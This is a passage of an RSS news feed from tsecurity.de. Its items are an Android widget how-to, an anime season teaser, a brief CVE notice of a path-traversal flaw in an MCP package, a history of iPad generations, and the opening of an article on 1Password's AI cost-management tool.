    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 wild ways to make Android widgets more useful]]></title>
<description><![CDATA[Widgets, widgets, widgets. Has there ever been an Android feature so full of promise that went unloved by Google for so very long?



Okay, so maybe there has been — erm, lots of times, actually. But even so, Android’s widgets system is a perfect example of an exceptional advantage that Google ba...]]></description>
<link>https://tsecurity.de/de/3670233/it-nachrichten/5-wild-ways-to-make-android-widgets-more-useful/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670233/it-nachrichten/5-wild-ways-to-make-android-widgets-more-useful/</guid>
<pubDate>Wed, 15 Jul 2026 12:03:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Widgets, widgets, widgets. Has there ever been an Android feature so full of promise that went unloved by Google for so very long?</p>



<p class="wp-block-paragraph">Okay, so maybe there has been — erm, <a href="https://www.computerworld.com/article/1714997/android-features-faded.html">lots of times</a>, actually. But even so, Android’s widgets system is a perfect example of an exceptional advantage that Google basically buried, abandoned, and left on the brink of extinction up until its overdue revival in 2021’s <a href="https://www.computerworld.com/article/1616489/24-advanced-tips-for-android-12.html">Android 12 update</a>. (And that revival, by the way, happened for no apparent reason whatsoever. Just a totally random, unprompted change of heart after a decade of indifference. <a href="https://www.computerworld.com/article/1639159/android-missed-opportunity.html">Riiiiiiiiight</a>.)</p>



<p class="wp-block-paragraph">Google may have given up on widgets for a while, but the good news is that (a) they’re back, baby — still now, more than ever, even in <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">our overly AI-obsessed 2026 timeline</a> — and (b) the Android developer community keeps chuggin’ along and coming up with ever-more creative new ways to embrace widgets beyond what Google itself sees fit to give us. That means no matter what <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html">Android version</a> your favorite phone is running, you can step up your own Android widget game and give yourself some fresh and fruitful paths to make the most of your phone’s framework.</p>



<p class="wp-block-paragraph">Here, my dear, are some fantastic beyond-the-basics ways to put <a href="https://www.computerworld.com/article/1699499/best-android-widgets-for-busy-professionals.html">your favorite Android widgets</a> to use and change the way you get stuff done on your phone. </p>



<p class="wp-block-paragraph"><strong>[Psst: Love learning new things?</strong> <a href="https://theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong>Get my free Android Intelligence newsletter</strong></a><strong> to get a tasty new tip in your inbox every Friday.]</strong></p>



<h2 class="wp-block-heading">Android widget enhancement #1: The on-demand home screen pop-up</h2>



<p class="wp-block-paragraph">Widgets are a wonderful way to interact with all sorts of info without ever having to open up apps, but having too many widgets can quickly lead to a cluttered and overwhelming home screen.</p>



<p class="wp-block-paragraph">Well, here’s a neat way to give yourself the benefit of a widget while still maintaining a neat and minimal space for working: An excellent app called <a href="https://play.google.com/store/apps/details?id=com.ss.popupWidget" target="_blank" rel="noreferrer noopener">Popup Widget</a> lets you create an on-demand pop-up widget (get it?!) that looks like a regular ol’ icon on your home screen but then loads any widget you want when tapped.</p>



<p class="wp-block-paragraph">See?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-widgets-popup-widget-1.webp" alt="Android widgets: Popup Widget (1)" class="wp-image-4196884" width="800" height="835" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">Any widget, anytime — with Popup Widget on Android.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">You can even get <em>really</em> wild and set up a single icon that opens <em>multiple</em> widgets at the same time — like your inbox and your calendar together:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-widgets-popup-widget-2.webp" alt="Android widgets: Popup Widget (2)" class="wp-image-4196885" width="800" height="837" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">Popup Widget can even let you summon two widgets together with a single tap.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">Not bad, right?</p>



<p class="wp-block-paragraph">Popup Widget costs two bucks and doesn’t require any special permissions or manners of access. And it’s pretty simple and self-explanatory to set up: Once you install and open the app, it’ll walk you through adding in whatever pop-up widgets you want. You can choose the name and even the icon associated with each one along with its precise placement on your screen and how much the screen behind it should dim when it’s loaded.</p>



<p class="wp-block-paragraph">The app will offer to add the shortcut directly onto your home screen for you then, or you can also find all of your Popup Widget creations by pressing and holding the main Popup Widget icon in your app drawer.</p>



<p class="wp-block-paragraph">Alternatively, if you’re already using <a href="https://www.computerworld.com/article/1723954/android-launchers-for-enhanced-efficiency.html">a custom Android launcher</a> like <a href="https://play.google.com/store/apps/details?id=ginlemon.flowerfree&amp;hl=en_US" target="_blank" rel="noreferrer noopener">Smart Launcher</a> or <a href="https://play.google.com/store/apps/details?id=bitpit.launcher" target="_blank" rel="noreferrer noopener">Niagara</a>, you can find similar options for summoning widgets on demand within their settings — no separate apps even required.</p>



<p class="wp-block-paragraph">And that, my widget-loving wallaby, is but our first winning widget possibility.</p>



<h2 class="wp-block-heading">Android widget enhancement #2: The on-demand universal pop-up</h2>



<p class="wp-block-paragraph">If you like the idea of having a widget on demand but would rather have it be available to summon from <em>anywhere</em> instead of just from your home screen, this next wacky widget option is just the thing for you.</p>



<p class="wp-block-paragraph">It comes from a spectacular app called <a href="https://play.google.com/store/apps/details?id=com.ss.edgegestures" target="_blank" rel="noreferrer noopener">Edge Gestures</a>, which works in conjunction with Popup Widget to take that same concept and make it universally accessible. (I told ya it was wacky!)</p>



<p class="wp-block-paragraph">When you first install Edge Gestures, the app will prompt you to enable it as a system accessibility service and to grant it the ability to display over other apps. These permissions sound scary — and <a href="https://www.computerworld.com/article/1613704/android-security-warning.html">they should</a>! — but in the case of this specific utility, they’re absolutely appropriate and necessary in order for it to operate. The former is the only way an app is able to create a custom system-wide gesture, which we need for this setup to work its magic, and the latter is how your widget is able to be shown on top of whatever else you’re doing.</p>



<p class="wp-block-paragraph">(If you’re at all worried, note that Edge Gestures doesn’t request any other significant system permissions. Beyond that, it’s reputable, it’s been around for quite a long while, and it has a large number of overwhelmingly positive reviews.)</p>



<p class="wp-block-paragraph">Where were we? Oh, right: Once you’re inside the Edge Gestures configuration area, you’ll be able to select exactly what gesture you want to use for pulling up your widget. I’d think carefully about finding something that won’t interfere with anything else, like the system-level <a href="https://www.computerworld.com/article/1658581/android-gestures.html">Android gestures</a>, and that’ll be convenient to access without being a command you’re likely to trigger by mistake.</p>



<p class="wp-block-paragraph">So, for instance, you might make the gesture a simple swipe downward along the left side of your screen. To do that, you’d find the “Swipe down” option within the app’s “Left” tab, and you’d set it to “Popup Widget” — and then create or select whatever Popup Widget item you want. And remember: You can select one widget or <em>multiple</em> widgets, too.</p>



<p class="wp-block-paragraph">Prepare yourself for some serious oohing and ahhing:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-widgets-edge-gestures.webp" alt="Android widgets: Edge Gestures" class="wp-image-4196887" width="800" height="855" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">Your favorite widgets are never more than a swipe away with Edge Gestures on Android.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">As you can see, this opens up a whole new world of mobile multitasking potential. I mean, really: How could you <em>not</em> love that?!</p>



<p class="wp-block-paragraph">The final thing worth doing is going into all the <em>other</em> gesture options in that same configuration area and tapping “Clear” for each of ’em to get rid of Edge Gestures’ default actions. I’d also go into whichever side of the screen you <em>aren’t</em> using — left or right — and tap the toggle to turn the gestures for that side off entirely. That way, you won’t inadvertently activate any gestures that you don’t actually want or need.</p>



<p class="wp-block-paragraph">Edge Gestures costs $2 to use.</p>



<h2 class="wp-block-heading">Android widget enhancement #3: The physical key call</h2>



<p class="wp-block-paragraph">Next, here’s an interesting twist on that same on-demand Android widget idea: You can make any widget especially easy to access from anywhere without even having to mess around with any on-screen swiping by setting one of your phone’s <em>physical keys</em> as a trigger for the widget’s appearance.</p>



<p class="wp-block-paragraph">I’ll give you a second to catch your breath and process the sheer splendor of that sorcery.</p>



<p class="wp-block-paragraph">Back? Cool. So, the <em>key</em> to this feat (har har) is the combination of the aforementioned Popup Widget and a handy Android contraption called <a href="https://play.google.com/store/apps/details?id=io.github.sds100.keymapper&amp;hl=en_US" target="_blank" rel="noreferrer noopener">Key Mapper</a> — which makes it easy to map your phone’s physical keys to all kinds of crazy custom actions.</p>



<p class="wp-block-paragraph">In this case, we’ll set it up so that pressing and <em>holding</em> one of your volume keys causes whatever widget you want to be summoned, like so:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2024/06/floating-android-widget.webp" alt="Floating Android widget" class="wp-image-2144001" width="700" height="722" sizes="auto, (max-width: 700px) 100vw, 700px"><figcaption class="wp-element-caption">Yes, your volume key can cause a widget to appear (whoa!).</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">Pretty nifty, no?</p>



<p class="wp-block-paragraph">I’ve got step-by-step instructions for making this happen in <a href="https://www.computerworld.com/article/2143971/android-widgets-floating.html">this separate guide</a>.</p>



<h2 class="wp-block-heading">Android widget enhancement #4: The floating bubble</h2>



<p class="wp-block-paragraph">If you like the notion of having a widget always available but aren’t so keen on the hidden gesture concept, an app called <a href="https://play.google.com/store/apps/details?id=com.applay.overlay" target="_blank" rel="noreferrer noopener">Overlays</a> will let you create a small floating bubble that you can position anywhere on your screen and then tap to pull any widget up when you want it — just like with <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html#:~:text=Android%2017%20Pixel%20feature%20%231%3A%20Bubbles%20multitasking%20magic">Android’s recently revived Bubbles multitasking system</a>, only compatible with <em>any</em> Android device and version and with the simplicity of a widget instead of the complexity of an entire app.</p>



<p class="wp-block-paragraph">Check it out:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-widgets-overlays.webp" alt="Android widgets: Overlays" class="wp-image-4196886" width="800" height="852" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">Overlays puts a floating icon on your screen for easy ongoing widget access.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">By default, Overlays gives you a bunch of its <em>own</em> little widgets to choose from, but the real power comes from adding in widgets from the Android apps you actually rely on. To do that, tap the “Triggers” tab at the bottom of the Overlays configuration area, then tap the red plus button in the lower-right corner of the screen. Select “Manual,” then type in whatever name you want for your widget and tap the icon to pick any icon you like.</p>



<p class="wp-block-paragraph">Tap “Save,” then select “Widget” and find the widget you want from the list. At that point, you’ll see a preview of the widget. Move or resize it if you like, then hit the arrow in the upper-left corner of the screen to exit out of that interface. Last but not least, tap the name of your newly made widget on the screen that comes up next to change its status to “Always on.”</p>



<p class="wp-block-paragraph">As soon as you head out of the app and back to your home screen, your fancy new widget should pop right up. All you’ve gotta do is tap the little downward-facing arrow in its corner to minimize it down to a bubble, which you can then press and hold to move anywhere your widget-worshipping heart desires.</p>



<p class="wp-block-paragraph">Overlays can also create widgets that automatically appear based on <em>context</em> — so you could have something show up every time you connect to a certain Bluetooth device or Wi-Fi network, for instance. To explore those options, just follow the same steps from above but pick “Event” instead of “Manual” when you reach the “Triggers” tab configuration.</p>



<p class="wp-block-paragraph">Overlays is free with an optional $4 in-app upgrade that removes some ads from the configuration tool and unlocks a handful of advanced features.</p>



<h2 class="wp-block-heading">Android widget enhancement #5: The widget stack</h2>



<p class="wp-block-paragraph">Last but not least in our collection of wacky Android widget possibilities is one of my favorite widget wonders — and that’s the ability to stack <em>multiple</em> widgets and then swipe between ’em on your home screen without having ’em take up any extra space.</p>



<p class="wp-block-paragraph">Check it out:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-widgets-smart-launcher-stacked-widgets.webp" alt="Android widgets: Smart Launcher stacked widgets" class="wp-image-4196888" width="800" height="893" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">The space-saving simplicity of stacked widgets, as seen in Smart Launcher.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">This enhancement presents a bit of a choose-your-own-adventure-style path:</p>



<p class="wp-block-paragraph">First, if you’re using a reasonably recent Samsung Galaxy gizmo, the option is should already be present and available in your standard Samsung home screen setup. Just press and hold any open space on your home screen and then select the option to add a widget — then, once the widget is added, press and hold it and look for the “Create stack” command.</p>



<p class="wp-block-paragraph">With any other Android gadget — or even with a Samsung device, if you want extra options and flexibility — you can use a <a href="https://www.computerworld.com/article/1723954/android-launchers-for-enhanced-efficiency.html">custom Android launcher</a> like the aforementioned <a href="https://play.google.com/store/apps/details?id=ginlemon.flowerfree&amp;hl=en_US" target="_blank" rel="noreferrer noopener">Smart Launcher</a> or <a href="https://play.google.com/store/apps/details?id=bitpit.launcher" target="_blank" rel="noreferrer noopener">Niagara</a> as well as the retro-geeky T9-themed <a href="https://play.google.com/store/apps/details?id=com.loitran.minimalt9launcher.free" target="_blank" rel="noreferrer noopener">Key Launcher</a> I <a href="https://www.computerworld.com/article/4180222/retro-android-home-screen.html">introduced to you</a> earlier this summer.</p>



<p class="wp-block-paragraph">Those launchers replace your phone’s entire home screen environment and give you all sorts of interesting new possibilities for optimizing your interface and making it especially well-suited for <em>you</em>. And the stacked widget feature is just one small sliver of what they offer and how they’ll transform your Android experience.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-widgets-smart-launcher-stacked-widgets-setup.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android widgets: Smart Launcher stacked widgets setup" class="wp-image-4196890" width="1024" height="896" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">The setup interface for a widget stack within Smart Launcher.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">So there ya have it: five wacky, wild, wonderful ways to make widgets even more wow-inducing. Some days, you’ve just gotta love Android and the endless customization, control, and power it provides.</p>



<p class="wp-block-paragraph"><em>Put even more Googley goodness in your noggin with</em> <a href="https://theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><em>my free Android Intelligence newsletter</em></a><em> — one exceptional new thing to try every Friday!</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[„Mashle“ Staffel 3: Release-Monat von Season 3 steht fest]]></title>
<description><![CDATA[An der Magieschule aus „Mashle: Magic and Muscles“ sucht man normale Schüler vergeblich. Ob extrovertiert, introvertiert, sozial unbeholfen oder schlicht exzentrisch. Jeder ist auf seine ganz eigene Weise außergewöhnlich. Kein Wunder also, dass sich viele Fans fragen, wann die dritte Staffel ersc...]]></description>
<link>https://tsecurity.de/de/3670018/it-nachrichten/mashle-staffel-3-release-monat-von-season-3-steht-fest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670018/it-nachrichten/mashle-staffel-3-release-monat-von-season-3-steht-fest/</guid>
<pubDate>Wed, 15 Jul 2026 10:33:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An der Magieschule aus „Mashle: Magic and Muscles“ sucht man normale Schüler vergeblich. Ob extrovertiert, introvertiert, sozial unbeholfen oder schlicht exzentrisch. Jeder ist auf seine ganz eigene Weise außergewöhnlich. Kein Wunder also, dass sich viele Fans fragen, wann die dritte Staffel erscheint. Im Folgenden verraten wir euch, was bisher dazu bekannt ist.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15751 | mastergo-design mastergo-magic-mcp up to 0.2.0 mcp__getComponentGenerator component-workflow.md execute rootPath path traversal (Issue 90 / EUVD-2026-44571)]]></title>
<description><![CDATA[A vulnerability was found in mastergo-design mastergo-magic-mcp up to 0.2.0. It has been rated as critical. The affected element is the function execute of the file mastergo/component-workflow.md of the component mcp__getComponentGenerator. The manipulation of the argument rootPath leads to path ...]]></description>
<link>https://tsecurity.de/de/3669470/sicherheitsluecken/cve-2026-15751-mastergo-design-mastergo-magic-mcp-up-to-020-mcpgetcomponentgenerator-component-workflowmd-execute-rootpath-path-traversal-issue-90-euvd-2026-44571/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669470/sicherheitsluecken/cve-2026-15751-mastergo-design-mastergo-magic-mcp-up-to-020-mcpgetcomponentgenerator-component-workflowmd-execute-rootpath-path-traversal-issue-90-euvd-2026-44571/</guid>
<pubDate>Wed, 15 Jul 2026 05:09:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mastergo-design:mastergo-magic-mcp">mastergo-design mastergo-magic-mcp up to 0.2.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is the function <code>execute</code> of the file <em>mastergo/component-workflow.md</em> of the component <em>mcp__getComponentGenerator</em>. The manipulation of the argument <em>rootPath</em> leads to path traversal.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-15751">CVE-2026-15751</a>. An attack has to be approached locally. Furthermore, there is an exploit available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[iPad Generations List: Every Apple Model from 2010 to 2026]]></title>
<description><![CDATA[This is your definitive, chronological tour of the iPad. We’ll walk through every generation, what Apple shipped, the big firsts, and how each model pushed tablets forward. Bookmark it for reference and collecting, or to spot the exact iPad you own.



Before you start




Naming is messy. Apple ...]]></description>
<link>https://tsecurity.de/de/3668670/ios-mac-os/ipad-generations-list-every-apple-model-from-2010-to-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668670/ios-mac-os/ipad-generations-list-every-apple-model-from-2010-to-2026/</guid>
<pubDate>Tue, 14 Jul 2026 18:34:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is your definitive, chronological tour of the iPad. We’ll walk through every generation, what Apple shipped, the big firsts, and how each model pushed tablets forward. Bookmark it for reference and collecting, or to spot the exact iPad you own.



Before you start




Naming is messy. Apple mixes “iPad,” “iPad Air,” “iPad mini,” and “iPad Pro,” plus year/generation numbers. We’ll spell out each clearly.



Ports &amp; Pencils change a lot. 30-pin → Lightning → USB-C; Apple Pencil (1st) → Pencil (2nd) → Pencil (USB-C) → Pencil Pro.



Sizes shift. Classic 9.7-inch gave way to 10.2, 10.5, 10.9, 11, 12.9, 13 inches—and a tiny 7.9/8.3-inch mini.



Chips leap. A-series to Apple silicon (M-series) with desktop-class features.




The iPad Timeline, Every Generation, In Order



2010 — iPad (1st generation)







The original iPad landed like a new kind of computer: a 9.7-inch multi-touch slab running iPhone OS 3.2 on Apple’s A4 chip. No cameras, a 30-pin dock connector, and a 1024×768 IPS screen—but a bold idea: web, email, books, and apps in your hands. It sold millions and cemented the tablet as a mainstream device. 



2011 — iPad 2







A landmark refinement: 33% thinner, lighter, now with front and rear cameras, the new A5 chip, and the magnetic Smart Cover that woke the iPad when opened. Same 9.7-inch resolution, much faster feel. This design ethos—thinner, lighter, smarter—became iPad’s north star. 



2012 (Spring) — iPad (3rd generation)







“The new iPad” debuted the Retina display at 2048×1536—stunning at the time—powered by A5X for the heavier graphics load. It also added LTE options. Short life, huge impact: Retina became the baseline for Apple screens. 



2012 (Fall) — iPad (4th generation)







A fast mid-year pivot brought the A6X chip and, crucially, Lightning replacing the 30-pin connector—aligning iPad with the iPhone 5 ecosystem and opening an era of smaller, reversible cables. 



2012 — iPad mini (1st generation)







A beloved 7.9-inch form factor appeared with an A5 chip and a 1024×768 display. The mini made iPad one-handable and travel-friendly; its size would become a cult favorite for reading and fieldwork. 



2013 — iPad Air (1st generation)







The “Air” name said it all: a dramatically lighter 9.7-inch chassis with A7 (64-bit), ushering in desktop-style architectures on iPad. Sleek, efficient, future-proof. 



2013 — iPad mini 2 (Retina)







The mini caught up with Retina and A7 performance, shrinking few-compromise iPad power into a small body. (Mini 3 in 2014 added Touch ID but kept similar internals.)



2014 — iPad Air 2







The first laminated display with anti-reflective coating, a big visual upgrade, plus the A8X chip and Touch ID. Air 2 stayed relevant for years—many still consider it a classic. 



2015 — iPad mini 4







A meaningful update with a thinner build and A8; it became the long-lived “good enough” mini while Pro development accelerated.



2015 — iPad Pro 12.9 (1st generation)







iPad grew up—literally—with a 12.9-inch display, quad speakers, A9X, and two accessories that redefined the platform: Apple Pencil (1st gen) and Smart Keyboard. Creative pros and note-takers took notice; latency and precision changed the conversation about tablets. 



2016 — iPad Pro 9.7







A smaller Pro introduced True Tone and a color-sensitive ambient sensor—Apple’s screens started adapting to your environment. Cameras also leapt ahead here.



2017 — iPad (5th generation)







Apple rebooted the entry iPad: affordable 9.7-inch model with A9. No Pencil support yet, but it set a template for the value tier. 



2017 — iPad Pro 10.5 &amp; 12.9 (2nd gen)







ProMotion 120Hz arrived, making iPad feel instantly smoother—scrolling, gaming, Pencil latency, everything. It’s one of the biggest “you can feel it” upgrades in iPad history. 



2018 — iPad (6th generation)







The budget iPad finally gained Apple Pencil (1st gen) support, opening digital handwriting and art to schools and casual creators without Pro prices. 



2018 — iPad Pro 11 (1st) &amp; 12.9 (3rd)







The design reset: USB-C, Face ID, edge-to-edge “Liquid Retina,” no home button, and Apple Pencil (2nd gen) that snapped on magnetically to pair/charge. This set today’s Pro identity. 



2019 — iPad mini (5th) and iPad Air (3rd, 10.5-inch)







Both moved to A12 and Pencil (1st) support; Air gained Smart Keyboard compatibility, becoming the “most iPad for most people” mid-tier. 



2019 — iPad (7th generation)







A new 10.2-inch size and Smart Connector brought keyboard support to the base iPad—great for typing and students.



2020 — iPad Pro (A12Z, 2nd-gen 11-inch / 4th-gen 12.9)







Refined Pros with LiDAR for AR and a Magic Keyboard with trackpad, steering iPad toward laptop-style workflows. 



2020 — iPad (8th) and iPad Air (4th, 10.9-inch)







Entry iPad jumped to A12, while Air 4 adopted the Pro-like design, USB-C, and Apple Pencil (2nd)—a huge value shift that blurred the Pro line from below. 



2021 — iPad Pro (M1), iPad (9th), iPad mini (6th)







The Pros moved to Apple’s M1 with Thunderbolt; the 12.9-inch added mini-LED XDR for HDR punch. The base iPad got A13 and Center Stage. The mini 6 was reborn: 8.3-inch, USB-C, and Pencil (2nd) support—tiny, powerful, modern. 



2022 — iPad Air (5th, M1), iPad (10th), iPad Pro (M2)







Air gained M1; the 10th-gen iPad switched to USB-C with a landscape camera (but awkwardly used Pencil (1st) via an adapter). Pros with M2 added Apple Pencil hover—a nuanced but meaningful creator feature. 



2024 — iPad Pro (M4, Ultra Retina XDR OLED) &amp; iPad Air (M2, 11- and 13-inch)







The Pro made its biggest leap since 2018: tandem OLED (“Ultra Retina XDR”), the M4 chip, the thinnest Apple product ever, and the debut of Apple Pencil Pro (squeeze, barrel roll, haptics). The Air moved to M2 and gained a 13-inch size. Apple dropped the 9th-gen iPad and lowered the 10th-gen price.



2024 (Fall) — iPad mini (7th, A17 Pro)







Mini caught up with a big internal jump, adopting A17 Pro and the latest Pencil options while keeping the 8.3-inch portability fans love. 



2025 (Spring) — iPad Air (M3)







A swift spec bump to M3 kept Air squarely in the “sweet spot” for performance-per-dollar, alongside the modern Magic Keyboard and Pencil lineup.



2025 (Spring) — iPad (11th Generation)







The iPad (11th generation) is Apple’s latest refresh of its most popular tablet. Powered by the A16 Bionic chip, it offers faster performance, improved multitasking, and better efficiency compared to the previous A14-based iPad.



Spec Comparison



YearModelChipPortApple Pencil SupportKey Highlights2010iPad 9.7″ (1st gen)A430-pin—First iPad; 1024×768 IPS display2011iPad 2A530-pin—First with cameras; Smart Cover support2012iPad (3rd gen)A5X30-pin—First Retina display (2048×1536)2012iPad (4th gen)A6XLightning—Lightning replaces 30-pin connector2012iPad mini (1st, 7.9″)A5Lightning—First iPad mini2013iPad Air (1st)A7 (64-bit)Lightning—First 64-bit iPad; thinner design2013iPad mini 2A7Lightning—First Retina mini2014iPad Air 2A8XLightning—First laminated + anti-reflective display2015iPad mini 4A8Lightning—Slimmer, more powerful mini2015iPad Pro 12.9″ (1st)A9XLightning1st genFirst Apple Pencil; quad speakers2016iPad Pro 9.7″A9XLightning1st genTrue Tone display debuts2017iPad (5th gen)A9Lightning—Budget iPad line returns2017iPad Pro 10.5″ / 12.9″ (2nd)A10XLightning1st genFirst ProMotion 120Hz display2018iPad (6th gen)A10Lightning1st genPencil support comes to base iPad2018iPad Pro 11″ / 12.9″ (3rd)A12XUSB-C2nd genFace ID, no Home button, new design2019iPad mini 5A12Lightning1st genA12 performance in mini2019iPad Air 3 (10.5″)A12Lightning1st genSmart Keyboard support2019iPad (7th gen, 10.2″)A10Lightning1st genSmart Connector on base iPad2020iPad Pro (A12Z)A12ZUSB-C2nd genAdds LiDAR, Magic Keyboard with trackpad2020iPad Air 4 (10.9″)A14USB-C2nd genBrings Pro-style design to Air2020iPad (8th gen)A12Lightning1st genValue refresh2021iPad Pro (M1)M1USB-C / Thunderbolt2nd genFirst with M-series chip; mini-LED XDR (12.9″)2021iPad (9th gen)A13Lightning1st genCenter Stage front camera2021iPad mini 6 (8.3″)A15USB-C2nd genAll-new design, modernized mini2022iPad Air 5M1USB-C2nd genM-series comes to Air2022iPad (10th gen, 10.9″)A14USB-CUSB-C / 1st gen via adapterLandscape front camera2022iPad Pro (M2)M2USB-C / Thunderbolt2nd genIntroduces Pencil hover2024iPad Air (M2, 11″ / 13″)M2USB-CPencil Pro / USB-CFirst 13″ Air; Pencil Pro support2024iPad Pro (M4, 11″ / 13″)M4USB-C / ThunderboltPencil ProUltra Retina XDR OLED; thinnest iPad yet2024iPad mini 7A17 ProUSB-CPencil Pro / USB-CMajor internal leap for mini2025iPad Air (M3)M3USB-CPencil Pro / USB-CSpec bump; keeps pace with Pro features2025iPad (11th gen)A16 BionicUSB-CPencil (1st gen) / USB-CMagic Keyboard Folio support; Smart Connector



Conclusion



From a 9.7-inch “big iPod touch” to an M4-powered OLED slate with a pro-grade stylus, iPad never stood still. The early years chased thinness and Retina clarity; then came Pro accessories and 120Hz; today, Apple silicon and OLED push the tablet squarely into laptop territory for many workflows. Whether you value a featherweight mini, a balanced Air, or the bleeding-edge Pro, there’s a clear through-line: every generation made the computer more touchable, more portable, and, bit by bit, more capable.



FAQs



Which iPad first supported Apple Pencil? The 2015 iPad Pro 12.9 introduced Apple Pencil (1st gen). Pencil support expanded to the budget iPad in 2018, then to Pencil (2nd) in the 2018 Pro redesign, and to Pencil Pro in 2024 on the new Pro/Air.  Which iPad first used USB-C? The 2018 iPad Pro line. Air switched in 2020, mini in 2021, and the 10th-gen iPad in 2022.  What’s the thinnest iPad? The 2024 iPad Pro (M4)—Apple’s thinnest product to date—despite packing tandem OLED and a huge performance jump.  Do all iPad Pros have 120Hz ProMotion? All modern Pros (2017 and later) do; the 2015/2016 Pros pre-date ProMotion.  Is the iPad mini still alive? Yes. Mini 7 (2024) upgraded to A17 Pro, keeping the compact 8.3-inch form while adding modern Pencil options.]]></content:encoded>
</item>
<item>
<title><![CDATA[1Password moves into AI cost management, betting that token spend is the next enterprise budget crisis]]></title>
<description><![CDATA[1Password on Tuesday launched AI Spend and Consumption Management, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including Anthropic, Cursor, and OpenAI.The ...]]></description>
<link>https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</guid>
<pubDate>Tue, 14 Jul 2026 15:32:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://1password.com/">1Password</a> on Tuesday launched <a href="https://1password.com/product/saas-manager">AI Spend and Consumption Management</a>, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a>.</p><p>The move marks the latest strategic expansion for a company that built its reputation on password management for consumers and, over the past three years, has aggressively repositioned itself as a broader identity security and SaaS governance platform for enterprise buyers. With this release, 1Password is staking a claim in one of enterprise technology's newest and most chaotic budget categories: the consumption-based cost of large language models.</p><p>"Executives want teams to build faster with AI, but that speed is creating a new kind of spending pressure," Greg Henry, 1Password's chief financial officer, said in an exclusive interview with VentureBeat. "Developers are consuming tokens at a pace that traditional budgets weren't built to manage, and IT and finance teams are being asked to forecast and 